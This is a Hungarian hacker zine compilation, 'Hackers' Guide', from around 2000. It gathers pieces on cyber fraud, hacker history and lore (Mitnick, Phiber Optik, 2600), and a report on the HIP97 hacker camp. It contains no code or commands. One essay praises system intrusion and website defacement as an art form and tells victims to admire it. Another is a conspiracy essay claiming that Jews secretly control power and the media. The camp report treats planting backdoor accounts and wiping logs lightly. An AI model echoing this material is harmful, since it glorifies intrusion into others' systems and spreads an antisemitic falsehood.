indított (1994-ig viszont, amikor a háló még gyerekcipőben járt, mindössze egyet). Ez<br />
idáig a bírósági eljárások több mint 20 millió dollár fogyasztói kár megtérítését rótták<br />
ki, és éves szinten - becslések szerint - 250 millió dollárt meghaladó csalási<br />
tevékenységet számoltak fel.<br />
De az FTC nem elégszik meg ennyivel: képviselői februárban szenátusi<br />
meghallgatáson vettek részt, ahol a testület költségvetésének növelését<br />
szorgalmazták, hogy új internetes stratégiákat dolgozhassanak ki, valamint hogy<br />
felvehessék a harcot a cybercsalásokkal szemben. A pénz ahhoz kell, hogy az egyre<br />
találékonyabb rendszerek nyomába eredhessenek. Szeptemberben például az FTC<br />
olyan portugál és ausztrál személyek ellen indított pert, akik "honlapeltérítést" és<br />
"egérrablást" követtek el, amikor amerikai székhelyű website-okat engedély nélkül<br />
lemásoltak, s azokhoz megtévesztésig hasonló lapokat regisztráltattak a nagyobb<br />
internetes keresőkön. A vádlottak a mit sem sejtő vevőket a honlapokról pornó siteok<br />
láncolatához vezették, s azokból a laikus fogyasztók ki sem tudtak lépni. Az FTC<br />
elérte, hogy a bíróság határozatban parancsoljon megálljt a csalásnak, felfüggesztve<br />
az alperesek website regisztrációit.<br />
A felügyelő hatóságok szerint a cyberbűnözés virágzásának egyik fő oka az, hogy az<br />
emberek sokkal jobban bíznak az internetben, mint amennyire azt ez a rendszer<br />
kiérdemli. "Sok hasznos információhoz juthat az ember a hálón, de annak, amit ott<br />
tesz, 95 százaléka puszta jóhiszeműségen alapul" - mondja G. Philip Rutledge a<br />
pennsylvaniai értékpapír-felügyelet helyettes főtanácsadója. "Ez sajnos utat nyit a<br />
csalások előtt."<br />
Ha a cyberbűnözésnek gátat akarunk szabni, nincs más választás: a<br />
biztonságtechnológiának kell az internet következő húzóágazatává válnia.<br />
IRA SAGER, STEVE HAMM ÉS NEIL GROSS, NEW YORK JOHN<br />
CAREY, WASHINGTON-ROBERT D. HOF, SAN MATEO (c) Business<br />
Week<br />
- H3XR00T -<br />
http://hexnet.hpage.<br />
net/<br />
2000.03.0<br />
7.<br />
************************************************************************************************<br />
14
Alternatív kultúra: Hackerek<br />
forrás: http://www.internetto.hu/internetto/zene/altcult/<br />
hackerek<br />
Hackers’ Guide<br />
A Zen-tanítványok megfeleloi a számítógépes világban: matematikai muveleteket<br />
képesek fejben elvégezni tizenhatjegyu számokkal, és napokig elvannak néhány<br />
doboz Jolt üdíton meg pár zacskó chipsen. Bár maguk a hackerek szóba se állnak a<br />
crackerekkel, vagyis azokkal, akik szokatlan képességeiket számítógépes<br />
rendszerek szétrombolására használják, a tömegtájékoztatás általában nem tesz<br />
különbséget a két csoport között. Sot, a gonoszokat nevezi ki a hacker-mitológia<br />
fohoseinek, például a Phone Phreaks Kevin Mitnick-et, vagy a New York-i Masters of<br />
Deception csoportot (ld. még: Phiber Optik). Pedig az igazi hackerek csak a saját<br />
etikájuknak engedelmeskednek, ami úgy szól, hogy az információ szabadságra<br />
vágyik. Néhányan közülük, például Bill Gates, milliomosok lettek. (ld. még: Free<br />
Software Foundation, 2600)<br />
phone phreaks - telefonorültek<br />
Azok, akik abban lelik örömüket, hogy telefonrendszereket ismernek ki, hogy<br />
manipulálhassák. Elso példányaik a 60-as években bukkantak fel, jóval a<br />
komputerek és a crackerek (ld. hackerek) elott. A mufaj egyik legendás alakja,<br />
bizonyos Captain Crunch egy játékdobozzal képes volt 2600 Hertzes fütyülo hangot<br />
eloállítani, azt, amelyik a régi típusú telefonrendszereket irányította. A hang emlékét<br />
a 2600 magazin címe ma is orzi.<br />
2600<br />
Telefonorült (lásd phone phreaks) és számítógép-hacker olvasóknak szánt,<br />
negyedévente megjeleno fanzine: címe arra a frekvenciára utal, amelyet egy idoben<br />
a telefontársaságok szereloi használtak, hogy bejuthassanak vele a<br />
telefonvonalakra. Foszerkesztoje, Eric Corley Emmanuel Goldstein néven (George<br />
Orwell 1984 címu regényének mítikus ellenzéki figurája) adja ki a lapot, amely<br />
egyébként 1984-ben indult. Cikkei részint tanácsokat adnak telefon- és<br />
számítógéphálózatok elleni akciókhoz, másrészt kiáltványok az<br />
információszolgáltatásban muködo nagyvállalatok és az oket pártoló törvények ellen.<br />
Corley, ahol csak teheti, kiáll a hackerek mellett: még a Kongresszus egyik<br />
meghallgatásán is felszólalt, ahol kifejtette, hogy a hackerek nem a profit<br />
reményében, hanem a szellemi szabadság határainak kitágításáért követik el, amit<br />
elkövetnek, szemben a fehérgalléros - vagyis értelmiségi bq.nözôkkel és a külföldi<br />
kémekkel.<br />
15
Hackers’ Guide<br />
Mitnick, Kevin<br />
(1963) Legendás hacker, akinek sikerült betörnie az FBI vonalaira, és ezekrol<br />
követnie az ellene indított, majd két évig tartó embervadászatot. 1995 februárjában<br />
végül elkapták: nyolc héten át üldözte az Internet-en a komputerbiztonság legjobb<br />
szakértojének tartott Tsutomu Shimomura. A New York Times riportere, John Markoff<br />
követte a cyber-vadászatot. Megírt róla mindent, kivéve azt, hogy o és Shimomura<br />
filmszerzodést kötöttek a Mitnick-ügyrol. Markoff már régebben érdeklodött Mitnick<br />
bravúrjai iránt, az o akkor még ismeretlen alakjáról rajzolta a hacker figuráját az<br />
1992-ben megjelent Cyberpunk címu könyvben, amelynek társszerzoje volt. Mitnick<br />
kövér, szégyenlos, magányos kölyökként nott fel Los Angeles egyik elovárosában.<br />
Kamaszkorát a komputer mellett töltötte, sikerült betörnie a manhattani<br />
telefonközpont adattárába, sot - megelolegezve az 1983-as War Games címu filmet -<br />
a hadügyminisztérium hálózatába is. Nemcsak a számítógép elott volt sikeres<br />
hacker: "társadalommérnökként" - vagyis az olyan hacker-trükkök esetében, amikor<br />
csak személyes érintkezés során, például telefonszereloként fellépve lehet<br />
valamilyen kód birtokába jutni - is nagyokat alakított.<br />
Phiber Optik<br />
(Mark Abene, 1972) A komputer és a telefontechnológia mestere, a New York-i<br />
Masters of Deception (MOD) hacker-banda vezetoje. A csapat legnagyobb húzása<br />
1989-ben volt, amikor feljutottak New York egyik közszolgálati tévécsatornájának<br />
komputerhálózatára, és a képernyokön boldog Hálaadást kívántak a pulykáknak<br />
(Happy Thanksgiving, you turkeys, from all of us at MOD - a "turkey" szó egyébként<br />
idegbajos kis hülyét is jelent; másrészt viszont az amerikaiak, ha csak tehetik,<br />
Hálaadás ünnepén pulykasültet esznek - a ford.) Abene saját állítása szerint ebben<br />
nem volt benne. 1992 júliusában viszont benne volt egy sorozat, jobbára ártatlan<br />
számítógéphálózat-feltörésben, amiért egy évi börtönre ítélték. Tíz hónapot ült,<br />
ezalatt annyi újságíró kereste fel, hogy cellatársai elkeresztelték CNN-nek. A<br />
börtönben megtagadták tole a számítógépet, így sokak szemében valóságos népi<br />
hossé vált. Kiszabadulása után Stacy Horn, az Echo Bulletin Board System vezetoje<br />
alkalmazta. Legnagyobb húzásait Michelle Slatalla és Joshua Quittner The Gang<br />
That Ruled Cyberspace címu "hacker-szentéletrajza" örökítette meg.<br />
************************************************************************************************<br />
Hackerek<br />
Ötven évvel ezelott, amikor a számítógépek elterjedtek az egyetemeken,<br />
hackereknek azokat nevezték, akik a technikai színvonalat fejlesztették. A hackerek<br />
16
Hackers’ Guide<br />
rendszereket építettek, teszteltek, és új módszereket fedeztek fel. Voltak csoportjaik,<br />
akik a Technológiai Szociális Szolgálat név alatt voltak ismertek a nyilvánosság elott.<br />
Ok javították ezeket a számítógépes rendszereket.<br />
Ma, ötven évvel késobb, egész más csoportok hívják magukat "hackerek"-nek. Egy<br />
generáció eltunt, és velük együtt a beállítottságuk, a tudásuk, és céljaik. Manapság<br />
úgy tunik, hogy a hackerek már nem a számítógépek lehetoségeit kutatják, inkább<br />
rombolnak.<br />
De ki tudja ezeket az embereket a tettükért megvádolni?<br />
Ez egyfajta "hosszú utazás", amely nagy mennyiségű rombolást és főbenjáró<br />
bűncselekményt tartalmaz.<br />
"De miért van ez így?" - kérdezhetjük. Nos ennek egy egészen egyszerű oka van.<br />
Ha egy általános felhasználó úgy döntött, hogy egy pár fokkal feljebb akar kerülni a<br />
hierarchián azzal a céllal, hogy többet tudjon meg a számítógépérol, akkor ő a<br />
hacker címet fontosnak látja. Ők valahol hallották, hogy a hackerek valószínűleg<br />
mindentudó felhasználók, és ezért akarnak ők is azok lenni. Ezenkívül igen "Cool"<br />
dolog hackernek lenni (mint ahogy mozikban mutatták a hackereket).<br />
Tehát a tudatlan Heinz folytatja az utazását, és próbálkozással kezdi megtanulni a<br />
hackerkedést. Valakitől hallotta, hogy egy hackernek 30 programnyelvet és 10<br />
operációs rendszert kell ismernie. "Hmmm, mik az operációs rendszerek? A DOS<br />
nem az egyike ezeknek? Legalább lehetséges az, hogy mindenre, amire szükségem<br />
van, online megtalálhatom."<br />
A tudatlan Heinz fog egy keresőt, és rákeres a "hacker" szóra, mint keresett<br />
fogalomra. Eddig ez a kezdő az Internetet csak az iskolai kérdések miatt használta:<br />
újságok, enciklopédiák, tudományos (tan)tárgyak. Honnan tudhatja majd, hogy az<br />
információk, amit ő olvasni fog, valószínűleg minden szempontban hamisak lesznek?<br />
A kérdések rengeteg "földalatti" weblaphoz vezetnek vissza. - "Hackerek!".<br />
A tudatlan Heinz azonnal szörföl ezekre az oldalakra, és mindent elolvas, amihez<br />
hozzáfér. De a valóságban itt egyáltalán nem talál olvasnivalót, hanem helyette a<br />
következőket:<br />
- Cracks<br />
- DoS Tools<br />
- MS Windows-os trojan programok<br />
A kezdő ezeket a programokat mind elkezdi használni, azt gondolva, hogy ez<br />
minden, ami körül a Hackervilág forog.<br />
A valóságban ez nem így van. Ezek a programok elterjesztik a pusztulást, és nem<br />
tanítanak NEKED semmit sem. Ha ez az, amit te csinálni akarsz, akkor hát csináld. -<br />
De légy akár annak a tudatában is, hogy e programok használata soha nem fog<br />
téged "továbbvinni".<br />
Az igazi hackerek (programozók, biztonsági szakemberek, Internet profik) még<br />
mindig hasonló célokat követnek, mint akik 1950-ben. Ezek a hackerek kernel<br />
17
Hackers’ Guide<br />
modulokat, programokat, scannereket írnak, és hibákat találnak azzal a céllal, hogy a<br />
technikai rendszereket javítsák.<br />
Ezek az igazi hackerek, az emberek, akik minden lehetségest megcsinálnak. Nem<br />
azok az emberek a hackerek, akiket a fimekben, mint hackereket láttál. Ha valóban<br />
hacker akarsz lenni, akkor ne szórakozz ezeken a win32-es trójai programokon!<br />
írta: BinaryZer0<br />
magyarra fordította: Manguszta<br />
************************************************************************************************<br />
A törés művészete<br />
A `hackeles` sokban hasonlit a muveszetekhez, de sokkal komplexebb azoknal,<br />
sokban nehezebb es sokban konnyebb. Nehezebb, mert tobbnyire csak egy ut van,<br />
amin jarni lehet, es egy megoldas letezik... mivel mindig a tokeletes vegkifejlethez<br />
kell elerkezni, nem lehet hibazni mert akkor minden borul... Konnyebb azert, mert sok<br />
tampont letezik, lehet tapogatozni, igaz kicsit sotetben, de valahol mindig ott van a<br />
megoldas fenye, ott lebeg elottunk csak eszre kell venni, kell, hogy legyen annyi<br />
kreativitasunk, hogy megalkossuk.<br />
Nem a vegkifejlett a fontos, hanem az oda vezeto ut. A mu maga nem a deface vagy<br />
a muvunkkel valo henceges, hanem az, amig eljutunk oda. Magunk valasztunk, hogy<br />
ez az ut konnyu - azaz egyszeru - vagy pedig nehez - tehat muveszi. Persze az<br />
egyszerusegnek is megvan a maga szepsege, van amikor a legegyszerubb<br />
megoldashoz kell a legnagyobb kreativitas es ez visz egy kis komikumot a<br />
megoldasba. A deface-t fel lehet fogni ugy is, mint egy kis promociot a muvunknek,<br />
hogy tobben csodalhassak meg azt, tehat egyaltalaban nem elitelendo...<br />
Az alkotasnak amit krealtunk sok eredmenye lehet, melyet nevezhetunk akar<br />
sajtovisszhangnak, vagy lejaratasnak, de csak az igazi `muertok` tudjak elvezni a<br />
szepseget a munek.<br />
Vannak a muveszek kozott kevesbe kreativak is, - script-kiddie - de mindent lehet jol<br />
csinalni. Ha valaki jol banik az ecsettel - amit lehet, hogy mas adott a kezebe -<br />
akkoris lehet remekmuvet alkotni, mert ugy sem mindig konnyu az ut - egyszeru a<br />
mu.<br />
Meg kell probalni elvezni a dolgot es nem karogni mas torese felett, inkabb meg kell<br />
probalni megkeresni az O muveben is a szepseget, a tokeletesseget. Minden ember<br />
mast lat benne, de az az igazan ugyes, aki tud mindent a masik szemszogebol latni<br />
es megerteni a gondolkodasat.<br />
Akarva akaratlan okozhatunk kart, de a muveszetnek ez a fo szerepe eletunkben,<br />
hogy ujat teremtsen megreformalja a megszokott dolgokat, felrugja a trendeket es<br />
18
lazadjon a betokozodas ellen. Aki esetleg kart szenved egy mutol, annak is a<br />
szepseget kell keresnie, nem pedig tamadni.<br />
tobo - tobo@linuxfan.com<br />
Hackers’ Guide<br />
************************************************************************************************<br />
Mi az igazság<br />
Hallasz egy hirt a TV-ben, hazank nemsokara eler ilyen, olyan szintet Europaban,<br />
nemsokara javul az eletszinvonal. Hallasz egy masikat, amiben egy olyan erdektelen<br />
dolgot kozolnek, mint peldaul az aktualis tozsdeinformaciok. Az elsore azt mondod<br />
magadban, `Biztos csak egy ujabb atbaszas, a fele sem igaz, soha nem lesz jo az<br />
eletszinvonal...etc`, a lenyeg az hogy nem hiszed el, elfelejted. A masik hir tok<br />
erdektelen szamodra, viszont megeshet, hogy pont errol fogsz tarsalogni az egyik<br />
baratoddal, a lenyeg az, hogy megmarad a fejedben.<br />
Az ijen dolgok, amik megmaradnak az ember fejeben altalaban egy szoval<br />
definialhatok, melyet meg talan te is ismersz: `emlekek`. Az emlekek szerepe az<br />
eletedben nagyobb mint gondolnad, ezen tapasztalatok alapjan dontesz egyes<br />
szituaciokban, cselekszel hirtelen vagy megfontoltan. Mivel az emlekek<br />
megmaradnak akar tobb tiz evig is befolyassal lehetnek az egesz eletedre, es nem<br />
nehez elkepzelni mekkora hatalommal rendelkezik az aki az emlekeket `gyartja`.<br />
Eddig a pontig minden rendben is van, de mivan ha olyan dolgokat hallasz, amik<br />
alapjan ugy cselekszel a kesobbiekben, ahogy az az `emlekgyarosnak` megfelel?<br />
Hat ez bizony mar ciki. Most azt gondolhatod, hogy aaaa, hat teged nem befolyasol<br />
senki, te lazado vagy, etc... Ne hidd!<br />
99%, hogy a te szokasaid kozott is tobb olyan van, melyet az emlekeid miatt vettel<br />
fel. Nehez elhinni, de sok osztonod, melyek a szuletesed utan alakultak ki is<br />
befolyasolhato a tapasztalataid altal, tehat szinte nincs olyan terulet amit nem lehet<br />
iranyitani.<br />
Az, hogy ezek a dolgok leteznek teny, bizonyitani nem lehet, epp ettol ilyen tokeletes<br />
ez a rendszer. Tamadni oket, harcolni ellenuk, lazadni? Ertelmetlen, tobb okbol is, az<br />
egyik az, hogy ugy sem nyerhetsz, nem tudsz eleg embert felsorakoztatni, hogyha<br />
megis, ok sem `tisztak` nincs olyan ember, akit nem tudnak befolyasolni ha nagyon<br />
akarjak, mindenkinek lehet olyan dolgot mutatni amitol alapjaiban valtozik meg a<br />
gondolkodasa. Az ijen irasok pedig teljesen ertelmetlenek, mivel par nap vagy het<br />
mulva te is, aki olvasta el fogod felejteni, vagy azt hiszed, hogy talaltal valamit ami az<br />
egesz ellenkezojet bizonyitja. Ez a resze a dolognak teljesen automatikusan<br />
jatszodik le benned, nem tesznek erte. Van meg valami, amiert nem erdemes<br />
harcolni a `hatalom` ellen. Megpedig az, hogy aki megdont egy hatalmat, hatalomba<br />
kerul, es a hatalom elveszi az emberek eszet, nincs mit tenni, valaki mindig a tobbiek<br />
19
Hackers’ Guide<br />
felett all, es lehet, hogy mas modszerekkel fog cselekedni, de a rendszer mindig<br />
ugyanaz marad. Nagy hatalom tobbet tudni masoknal...<br />
Hogy, kik ezek? Nem lehet tudni, valoszinusitem, hogy a mindenkori ertelmisegi<br />
reteg elitje, akiknek van ahhoz eszuk, hogy mozgassak a szalakat, nem rasszizmus<br />
amit mondok, de a zsidok, vagy az o leszarmazottaik azok, akik bizonyitottan<br />
intelligensebbek a tobbi embernel, de termeszetesen semmi nem biztos ilyen teren.<br />
A lenyeg az, hogy a politika is csak egy alca ezen szervezetek mukodesenek, a<br />
partharcok, partok, politikusok csak babuk.<br />
Amit jo ha tudsz, minden amit hallasz, latsz a mediakban, a sajtoban, az interneten,<br />
kapcsolatban all a `hatalommal`, ami iranyitja az eletet. Meglehet, hogy ez a<br />
letszukseglet, enelkul nem tudnak elni, kaosz lenne, de az is lehet, hogy ez mindmind<br />
csak a hatalomert van, azert, hogy valaki feljebb alhasson a tobbieknel, tobbet<br />
tudva mindenkirol.<br />
Kerdes jogos lehet, hogy akkor miert adnak hirt a mediakban kulonbozo<br />
lehallgatasokrol, (Aktak) es hasonlo `titkosszolgalati` modszerekrol, miert hallasz<br />
hasonlo dolgokat sci-fi filmekbol? Csak gondold el, hogy ami ilyen jellegu informacio<br />
eljut hozzad az mind-mind mar `lejart dolog`. Mar reg ota nem hasznaljak, elavult,<br />
van sokkal jobb, precizebb, pontosabb es meg eszrevehetetlenebb. A minap lattam<br />
egy musort, ahol egy lehallgatot mutattak be, amely `negyedik generacios` volt, a<br />
mukodesenek lenyege az, hogy ha a szobaban van egy femtargy akkor az osszes<br />
hangot tovabbitani lehet minden mas eszkoz nelkul egy keszulekhez. Nos a poen<br />
nem az, hogy ennyire konnyen lehallgathatoak vagyunk, hanem az a teny, hogy<br />
jelenleg a hatodik generacios lehallgatokat fejlesztik. Elgondolkodtato...<br />
Ha elgondolkodsz logikus. Miert adnak ki a gyarakbol a fejlesztouzemekbol a<br />
legujabb technologiakat, a leggyorsabb szamitogepeket, etc., hogyha meg is<br />
tarthatjak, es a kovetkezo tehcnologia megjeleneseig hatalommal birhat az aki<br />
birtokolja, ismeri az akkori legfejletebbet? Valoszinuleg lassankent adagoljak a<br />
fejlodest, elkepzelhetonek tartom, hogy sok szaz globalis problemat meg tudnank<br />
mar oldani, ha az uj technologiakat nem tartanak vissza.<br />
Megeshet, hogy sokan ezt az iromanyt badarsagnak tartjatok, de elhihetitek van<br />
benne igazsag, csak el kene egy kicsit gondolkodni a dolgokon.<br />
tobo - tobo@linuxfan.com<br />
************************************************************************************************<br />
Kevin D. Mitnick, a CyberKalóz<br />
A világ legveszélyesebbnek kikiáltott hackerét, az Amerikában évek óta körözött<br />
Kevin D. Mitnicket több mint egy éve egy sértett adatvédelemszakértô fogta el<br />
kéthónapos digitális bújócska és fogócska után. A számítógépkalózra az FBI,<br />
20
Hackers’ Guide<br />
Tsutomu Shimomura cyberdetektívre pedig az új típusú hôsökre vadászó amerikai<br />
média csapott le egy esôs februári hajnalon.<br />
Kevin nem az az anyagias típus. Bár tinédzser kora óta bohócot csinál bármely<br />
digitális rendszervédelembôl és az általa eltulajdonított szupertitkos dokumentumok,<br />
friss fejlesztésű szoftverek és egyéb nagyértékű információk összértékét több<br />
százmillió dollárra becsülik, pénzhiány miatt hivatalból kirendelt ügyvéd védi. Az ôt<br />
rendôrkézre juttató hibát 1994 karácsonyán követte el.<br />
Tsutomu Shimomura, az USA egyik vezetô adatvédelmi szakértôje, a San Diego<br />
Supercomputer Center üdvöskéje éppen szokásos évi síszabadságát töltötte a Sierra<br />
Nevadában amikor munkatársai elképesztô hírt adtak a tudtára. 1994 december 25.én<br />
az Interneten át valaki behatolt a tengerparti házában működô<br />
számítógéprendszerbe, kipakolta a legújabb adatbiztonsági programjait, tréfás<br />
hangüzenetet hagyott a merevlemezen és távozott. Az ismeretlen hacker az<br />
Interneten alkalmazott Unix operációs rendszer egy olyan biztonsági hiányosságát<br />
használta ki amelynek elméleti lehetôségét egy másik híres számítógépbetyár,<br />
Robert T. Morris, az Internet Worm hálózati pszeudo-vírus kiagyalója már 1985-ben<br />
felvetette. Az cyberzsaru a hálón keresztül azonnal telekürtölte a világot a hírrel,<br />
felvette a kapcsolatot az FBI képviselôivel, és ezzel megkezdôdött a két<br />
számítógépes zseni sakkjátszmája a cybervilágot jelentô digitális számítógép és<br />
telefonhálózatok dzsungelében.<br />
A sors iróniája, hogy az elsô nyomot január végén egy Számítógépek, Szabadság és<br />
Privátszféra elnevezésű alapítvány Internet postafiókjában találták, ahová az<br />
információszabadság még mindig névtelen bajnoka felmásolta a Shimomurától lopott<br />
adatvédelmi dokumentációt. Az alapítvány nem értékelte a gesztust, azonnal<br />
értesítették a hatóságokat. Nem telt el 24 óra, és Shimomura az e célra készített<br />
speciális megfigyelô program segítségével már laptopja képernyôjén követte nyomon<br />
az alapítvány Internet-szolgáltatójánál, a kaliforniai Berkeley Whole Earth 'lectronic<br />
Link (Well) szerverén történt újabb behatolást. Az elkövetô profizmusa, stílusa és<br />
módszerei egyaránt az évek óta illegalitásban tevékenykedô Mitnickre terelték a<br />
gyanút.<br />
Mitnick élettörténete egy folytatásos digitális ámokfutás. A lapok címoldalaira elôször<br />
1982-ben került, amikor bejutott az Amerikai Légvédelem egyik szuperkomputerébe.<br />
Tizenhét évesen egy telefonfülkébôl feltörte a Pacific Bell számítógéprendszerét,<br />
több telefonszámlát lenullázott és ellopott mintegy 200.000 dollár értékű adatot. Hat<br />
hónapot kapott egy nevelôintézetben, próbaidôvel szabadult, de azonnal törölte az<br />
ügy részleteit a rendôrség adatbázisából, megsemmisítette a bíró bankszámláját egy<br />
bankban, majd Izraelbe menekült. Amikor a dolog elfelejtôdött, visszatért az<br />
államokba, de nemsokára ismét hallatott magáról. Mindig igyekezett megsemmisíteni<br />
minden személyére utaló adatot, de 1988-ban (ekkor 25 éves volt) több hiábavaló<br />
kisérlet után sikerült rábizonyítani hogy 4 millió dollár értékű kárt okozott az egyik<br />
vezetô amerikai számítógépgyár, a Digital Equipment Corporation (DEC)<br />
adatbázisaiban biztonsági szoftverek és titkos kódok eltulajdonításával. A tárgyalás<br />
során az ügyész rámutatott : "Ez az ember nagyon, nagyon veszélyes, a saját és a<br />
társadalom érdekében távol kell tartanunk minden számítógéptôl", a börtönben még<br />
telefonközelbe sem engedték. Ügyvéde bizonyította hogy kliense számítógépfüggôségben<br />
szenved, így egy éves börtönbüntetés után próbaidôre bocsátották és<br />
egy Los Angelesi terápiás intézetben helyezték el. Szabadulása után rögtön<br />
21
Hackers’ Guide<br />
megsértette a próbaidô feltételeit és 1992 óta eltűnt a hatóságok szeme elôl. A<br />
cybertérben idôrôl idôre felbukkant azóta is, többek között FBI kódokkal behatolt több<br />
állami adatbázisba, és nagy rádiótelefon-gyártó cégektôl, mint például a Motorola,<br />
NEC, Nokia pedig rendszeresen elemelte az operációs szoftvereket.<br />
Február 9.-én egy másik Internet-szolgáltató, a San Jose székhelyű Netcom<br />
illetékesei felfedezték hogy valaki mintegy 20.000 felhasználójuk hitelkártyaszámát<br />
vitte el. Ez súlyos könnyelműség volt Mitnick részérôl, mert a Netcom dial-up, vagyis<br />
telefonvonalon elérhetô szolgáltatást biztosít, a támadás is telefonon keresztül érte,<br />
így kitalálható hogy ez volt a hacker kiindulópontja, az a bázis, ahol a<br />
telefonhálózaton keresztül csatlakozott az Internet számítógép-világhálózatra.<br />
Shimomura és stábja áthelyezte székhelyét a Netcom-hoz, gyakorlatilag nem volt<br />
más dolguk mint ellenôrizni minden egyes bejövô hívást a telefontársaságok<br />
adatbázisaiban. Hamarosan rájöttek hogy a hacker egy fiktív rádiótelefonról dolgozik,<br />
hívásait két megpiszkált adatbázisú lokális központ egyaránt a másiknak<br />
tulajdonította. Shimomura és az FBI a helyszínen munka közben bemérték, és<br />
február 16.-án hajnalban elfogták Mitnicket.<br />
Az amerikai sajtó egyre növekvô érdeklôdéssel figyelte az ügyet, amely a Masters of<br />
Deception fedônevű hacker társaság óta a legfelkapottabb cyber-szenzáció. A New<br />
York Times folyamatosan tudósított az ügyrôl, hasábjain Shimomura posztmodern<br />
hérosszá magasztosult. A Hyperion kiadó máris 600.000 dollár foglalót adott a<br />
Shimomura és John Markoff, a New York Times riportere által írandó könyvre,<br />
Hollywood is érdeklôdik, meg nem erôsített hírek szerint maga Spielberg rendezné a<br />
filmváltozatot.<br />
Az Internetet komolyan megosztotta az ügy, egyesek elmarasztalják Mitnicket a<br />
hacker etika megsértése miatt, a legkomolyabb érv az Internet alapvetôen kölcsönös<br />
bizalomra, és nem high-tech adatvédelemre épülô struktúrájának megkérdôjelezését<br />
rója fel a megszállott crackernek. A jelenség komolyan hátráltathatja az Internet<br />
utóbbi idôben egyre inkább tettenérhetô kommercializálódását, ez viszont már inkább<br />
dícséret az egyre halványuló nonprofit jelleget támogatók részérôl. A mátrix<br />
eredendôen anarchista tulajdonságait kedvelô komputer-underground körökben<br />
pedig napról-napra terebélyesedik a Condor fedônevű cyberpunk mítosza. Az a tény,<br />
hogy Mitnick nem próbált meggazdagodni akciói révén, és hogy a SUN<br />
Microsystems, a nyílt számítógépes rendszerek gyártója és hálózati szoftverek<br />
fejlesztôje biztonság-tesztelési szempontból egyenesen hasznosnak tartja az efféle<br />
betöréseket, egyaránt megkérdôjelezi a deviáns zsenit börtönbe juttató jogrendszer<br />
helytállóságát.<br />
Bodoky Tamás írása alapján.<br />
Megtalálta és átszerkesztette: WALTER<br />
************************************************************************************************<br />
22
Hacker találkozó Hollandiában<br />
Hackers’ Guide<br />
Mottó: "A hack-elés nem egy technikai dolog, hanem egy életforma!"<br />
-az ismeretlen hacker-<br />
Nem árt elõre tisztázni, hogy a hacker és a cracker szó között tartalmilag óriási a<br />
különbség! A hacker behatol, élvezi a bentlétet, a sikert, otthagyja nyomát<br />
(legtöbbször csinál magának egy jó azonosítót "jó lesz ez még késõbb" alapon), majd<br />
távozik. Akad olyan is, aki eltávolít minden nyomot, hogy ne tanuljon senki sem a log<br />
file-ok tartalmából. A mûveletsor asszociálható máshoz, de rossz az aki rosszra<br />
gondol :-)<br />
A hacker szó annak idején a kisebb kapacitású gépek képességeit maximálisan<br />
kihasználó programozót illette, aki a gép legmélyebb részeibe is belekotort, hogy<br />
programjait használhassa. Sokszor versenyeztek is, hogy egy adott feladatot ki tud<br />
optimálisan megoldani.<br />
A cracker viszont rosszra használja a lehetõséget, és nagy károkat okoz, mint<br />
amilyen kár lehet egy a gyökérkönyvtárra kiadott rekurzív törlés parancs, amire volt<br />
már példa egyetemi és üzleti szférában egyaránt.<br />
Vannak nehezen eldönthetõ esetek is (hacker vagy cracker?), ilyen a megbántott<br />
svéd, magukat hacker-eknek valló emberek története, akik a CIA Web lapját<br />
alakították át egy kicsit. A CIA mellett hasonló támadásnak esett áldozatául többek<br />
között a Légierõ, a Fehér Ház, és az FBI Web szervere is. Természetesen nem kell<br />
annyira misztifikálni a dolgot, ha egy Web szerver "elesik", hisz nem ezeken tárolják<br />
a bizalmas adatokat az ilyen szervek! Ma a http://www.skeeve.net/cia/ alatt lehet<br />
megtalálni az akkori lapok mását. Kárt ugyan nem okoztak, de nem is díjaznák õket,<br />
ha horogra kerülnének!<br />
Egy kérdés: vajon az egyes államok nem alkalmaznak-e hacker-t és cracker-t<br />
egyaránt, bizonyos információk megszerzésére, mint ahogyan tette ezt az U.S.A. a<br />
GATT tárgyalások elõtt fontos információkhoz jutva (a brit állítás nem bizonyított),<br />
vagy az Öböl-háborúban megbénítva az iraki kommunikációs rendszert? Hacker<br />
vagy cracker?<br />
***<br />
A HIP (Hacking In Progress - http://www.hip97.nl) helyszíne az "In The Middle Of<br />
Nowhere" azaz a "Sehol Közepe" nevet kapta, ami valójában a hollandiai Almere-<br />
Buiten közelében felállított ideiglenes kempinget jelenti. A kempingtábor, a<br />
körülményekhez képest korrekt tisztálkodási és étkezési lehetõségekkel volt<br />
felszerelve. Az árak ebben az országban sem a mi kereseteinkhez szabottak, bár<br />
helybeliként az 1200 (holland) forint havi munkanélküli segélybõl is megélnénk, ami<br />
közel 120.000 (magyar) forint...<br />
Az infrastruktúrához hozzátartozott, hogy telefonálni is lehetett a felállított kártyás<br />
telefonokról, a mellette levõ automatából pedig folyamatosan lehetett venni a<br />
telefonkártyát. A "Hall"-ban a legnagyobb sikert a Jolt Cola aratta<br />
(http://www.joltcola.com), ami félhivatalosan hacker ital a magas koffeintartalma<br />
23
Hackers’ Guide<br />
miatt. Ennek segítségével kitartóbban lehet hajnalig dolgozni, amikor egyes<br />
fáradtabb root-ok már nyugovóra térnek...<br />
A táborban sátrak tömkelege. A szervezõk adatai alapján a táborban több, mint<br />
kétezer ember volt és több száz számítógép. Volt aki hozott saját parabolaantennát<br />
vagy micro-t! A leghatásosabb látványt számomra az a fehér teherautó jelentette,<br />
aminek szegecselt borítása kissé megviseltnek látszott, és a hátsó része ki volt<br />
nyitva, így lehetett látni, hogy a rozoga külsõ mögött több számítógép is üzemel. A<br />
melegben félmeztelenre vetkõzött hosszú hajú srácok a MetallicA Kill'em all címû<br />
lemezét hallgatták, miközben a hack-elés folyamatban volt...<br />
No remorse, no repent<br />
We don't care what it meant<br />
Another day, another death<br />
Another sorrow, another breath<br />
Attack...<br />
Majd ezt követte a Seek & Destroy és a Metal Milita... Az összkép pezsdítõ!<br />
A Metal Rendõrség nem, de a holland FBI 24 órán keresztül képviseltette magát az<br />
összejövetelen, így nem mindenki mert a nyilvánosság elõtt mindent bemutatni.<br />
Ugyanakkor zárt körökben az emberek igencsak megnyíltak, és szívesen mutatták<br />
be tudományukat. A zárnyitók sátrában is nagy volt a forgalom, de elõadást õk sem<br />
tartottak... Reklámoztak viszont egy "HACKS" címû filmet. A filmet Christine Bader<br />
készítette a hacker-ekrõl és Bielefeld városában fogják bemutatni október 5.-én.<br />
Talán akad majd filmforgalmazó, aki Magyarországra is behozza a filmet!?<br />
Hack-elni nemcsak számítógépet vagy zárakat lehet, de az elsõ órák után a<br />
belépõket is, így tökéletes sajtós belépõket is lehetett szerezni!<br />
A nagy számú holland résztvevõk mellett nagyon sok volt a külföldi is. Még<br />
